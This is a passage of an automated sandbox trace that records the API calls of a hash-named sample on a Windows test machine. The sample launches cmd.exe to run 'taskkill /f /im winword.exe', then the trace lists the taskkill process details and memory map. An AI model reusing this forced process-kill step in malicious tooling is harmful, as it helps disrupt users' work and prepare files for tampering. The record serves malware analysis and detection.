_String2="ERASE") returned 15 [0227.631] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0227.631] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0227.631] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0227.631] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0227.632] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0227.632] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0227.632] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0227.632] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0227.632] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0227.632] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0227.632] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0227.632] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0227.632] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0227.632] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0227.632] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0227.632] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0227.632] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0227.632] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0227.632] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0227.632] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0227.632] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0227.632] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0227.632] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0227.632] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0227.632] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0227.632] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0227.632] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0227.632] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0227.632] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0227.633] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0227.633] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0227.633] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0227.633] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0227.633] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0227.633] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0227.633] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0227.633] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0227.633] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0227.633] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0227.633] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0227.633] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0227.633] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0227.633] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0227.633] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0227.633] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0227.633] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0227.633] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0227.633] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0227.633] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0227.633] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0227.633] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0227.633] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0227.634] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0227.634] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0227.634] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0227.634] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0227.634] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0227.634] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0227.634] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0227.634] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0227.634] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0227.634] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0227.634] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0227.634] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0227.634] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0227.634] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0227.634] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0227.634] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0227.634] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0227.634] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0227.634] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0227.634] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0227.634] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0227.634] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0227.634] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0227.634] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0227.635] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0227.635] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0227.635] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0227.635] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0227.635] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0227.635] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0227.635] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0227.635] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0227.635] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0227.635] GetProcessHeap () returned 0x690000 [0227.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x69ad10 [0227.635] GetProcessHeap () returned 0x690000 [0227.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x44) returned 0x69af28 [0227.636] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0227.636] GetProcessHeap () returned 0x690000 [0227.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x6905c8 [0227.636] SetErrorMode (uMode=0x0) returned 0x8003 [0227.636] SetErrorMode (uMode=0x1) returned 0x0 [0227.639] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6905d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0227.639] SetErrorMode (uMode=0x8003) returned 0x1 [0227.639] GetProcessHeap () returned 0x690000 [0227.639] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6905c8, Size=0x56) returned 0x6905c8 [0227.639] GetProcessHeap () returned 0x690000 [0227.639] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6905c8) returned 0x56 [0227.639] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0227.639] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0227.639] GetProcessHeap () returned 0x690000 [0227.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x110) returned 0x69af78 [0227.639] GetProcessHeap () returned 0x690000 [0227.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x218) returned 0x690628 [0227.644] GetProcessHeap () returned 0x690000 [0227.644] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x690628, Size=0x112) returned 0x690628 [0227.644] GetProcessHeap () returned 0x690000 [0227.644] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x690628) returned 0x112 [0227.644] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0227.644] GetProcessHeap () returned 0x690000 [0227.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe0) returned 0x69b090 [0227.646] GetProcessHeap () returned 0x690000 [0227.646] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69b090, Size=0x76) returned 0x69b090 [0227.646] GetProcessHeap () returned 0x690000 [0227.646] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69b090) returned 0x76 [0227.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0227.646] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0227.647] GetLastError () returned 0x2 [0227.647] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0227.647] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x69b110 [0227.647] GetProcessHeap () returned 0x690000 [0227.647] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x14) returned 0x697628 [0227.647] FindClose (in: hFindFile=0x69b110 | out: hFindFile=0x69b110) returned 1 [0227.647] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0227.647] GetLastError () returned 0x2 [0227.647] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x69b110 [0227.647] GetProcessHeap () returned 0x690000 [0227.647] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x697628, Size=0x4) returned 0x69b150 [0227.647] FindClose (in: hFindFile=0x69b110 | out: hFindFile=0x69b110) returned 1 [0227.648] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0227.648] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0227.648] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0227.649] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0227.649] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0227.649] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158)) [0227.650] GetProcessHeap () returned 0x690000 [0227.650] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x18) returned 0x6975e8 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.650] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0227.651] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0227.651] GetProcessHeap () returned 0x690000 [0227.651] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6975e8) returned 1 [0227.651] GetProcessHeap () returned 0x690000 [0227.651] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa) returned 0x69b110 [0227.651] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0227.655] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im winword.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im winword.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im winword.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x1154, dwThreadId=0x1128)) returned 1 [0227.673] CloseHandle (hObject=0x98) returned 1 [0227.673] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0227.673] GetProcessHeap () returned 0x690000 [0227.673] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x699d50) returned 1 [0227.674] GetEnvironmentStringsW () returned 0x699d50* [0227.674] GetProcessHeap () returned 0x690000 [0227.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa76) returned 0x697cc0 [0227.675] FreeEnvironmentStringsA (penv="=") returned 1 [0227.675] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0228.579] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0228.579] CloseHandle (hObject=0x9c) returned 1 [0228.580] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0228.580] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0228.580] GetProcessHeap () returned 0x690000 [0228.581] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697cc0) returned 1 [0228.581] GetEnvironmentStringsW () returned 0x69b160* [0228.581] GetProcessHeap () returned 0x690000 [0228.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa9c) returned 0x697cc0 [0228.581] FreeEnvironmentStringsA (penv="=") returned 1 [0228.581] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0228.581] GetProcessHeap () returned 0x690000 [0228.581] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697cc0) returned 1 [0228.581] GetEnvironmentStringsW () returned 0x69b160* [0228.581] GetProcessHeap () returned 0x690000 [0228.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa9c) returned 0x697cc0 [0228.582] FreeEnvironmentStringsA (penv="=") returned 1 [0228.582] GetProcessHeap () returned 0x690000 [0228.582] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69b110) returned 1 [0228.582] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0228.582] _get_osfhandle (_FileHandle=1) returned 0x154 [0228.582] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0228.582] _get_osfhandle (_FileHandle=1) returned 0x154 [0228.582] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0228.582] _get_osfhandle (_FileHandle=0) returned 0x144 [0228.582] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0228.582] GetConsoleOutputCP () returned 0x1b5 [0228.583] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0228.583] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.584] exit (_Code=128) Thread: id = 414 os_tid = 0x1120 Process: id = "84" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2d025000" os_pid = "0x1154" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0x514" cmd_line = "taskkill /f /im winword.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5916 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5917 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5918 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5919 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5920 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5921 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 5922 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5923 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 5924 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 5925 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5926 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 5927 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5928 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5929 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5930 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5931 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5932 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5933 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5934 start_va = 0x44d0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 5935 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5936 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5937 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5938 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5939 start_va = 0x44e0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 5940 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5941 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5942 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5943 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5944 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5945 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5946 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5947 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5948 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5949 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 5950 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5951 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5952 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5953 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5954 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5955 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5956 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" 